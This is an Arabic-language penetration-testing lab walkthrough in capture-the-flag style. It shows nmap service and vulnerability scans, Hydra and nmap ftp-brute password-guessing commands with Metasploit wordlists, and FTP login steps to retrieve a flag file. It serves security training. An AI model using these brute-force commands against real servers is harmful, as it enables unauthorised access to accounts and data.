🧪 المختبر 9: هجوم القوة الغاشمة (Brute-Force) على خادم FTP في Linux (باستخدام Hydra)

🎯 الهدف الأساسي: اختراق خادم FTP باستخدام هجمات القوة الغاشمة (Brute-Force) للعثور على بيانات اعتماد تسجيل الدخول صالحة واسترداد الأعلام (Flags) المخفية.

🔧 الأدوات المستخدمة: nmap, hydra, ftp, 📜 خطوات التنفيذ:

📊 منهجية اختبار الاختراق: الاستطلاع، الفحص، القوة الغاشمة (Brute-Force)

  1. الفحص واكتشاف خدمة FTP:

    • قم بإجراء فحص Nmap على الهدف لتحديد خدمة FTP وإصدارها.

    • الأمر:

      nmap -sV [<Target_IP>]
    • الشرح: ستجد خادم FTP يعمل (مثلاً ProFTPD version 1.3.5A) على المنفذ 21.

    • اكتشاف الثغرات (اختياري، باستخدام سكريبت Nmap):

    • الأمر:

      nmap --script ftp-vuln --script-args ftp-vuln.skip_tree_traversal -p 21 <Target_IP>
    • الشرح: بيساعدك في تحديد الثغرات المعروفة في ProFTPD، مثل ثغرة "backdoor" الي يمكن توفر وصول كا ROOT .

  2. هجوم القوة الغاشمة على FTP باستخدام Hydra:

    • استخدم Hydra لتخمين بيانات اعتماد تسجيل الدخول لـ FTP باستخدام قوائم كلمات المرور وأسماء المستخدمين.

    • الأمر الأساسي:

      hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/common_passwords.txt <Target_IP> ftp
    • الشرح: ستبدأ Hydra في تجربة مجموعات مختلفة من أسماء المستخدمين وكلمات المرور. بتظهر الصالحة باللون الأخضر.

      • الأمر: اختياري

        echo "sysadmin" > users.txt
        nmap --script ftp-brute --script-args userdb=users.txt,passdb=/usr/share/metasploit-framework/data/wordlists/common_passwords.txt -p 21 <Target_IP>
      • الشرح: إذا نفذت هذه الأوامر، سيحاول Nmap تخمين كلمة مرور المستخدم sysadmin.

  3. تسجيل الدخول وجمع الأعلام (Flags):

    • بمجرد العثور على بيانات اعتماد صالحة، استخدم عميل FTP لتسجيل الدخول إلى الخادم.

    • الأمر:

      ftp <Target_IP>
    • الشرح: سيطلب منك اسم المستخدم وكلمة المرور (استخدم البيانات التي حصلت عليها من Hydra).

    • الأمر: (بعد تسجيل الدخول)

      ls
      get secret.txt
      exit
      cat secret.txt
    • الشرح: بيعرض لك الوحدة قائمة بالملفات والدلائل، وستتمكن من تنزيل وقراءة ملف العلم.

Last updated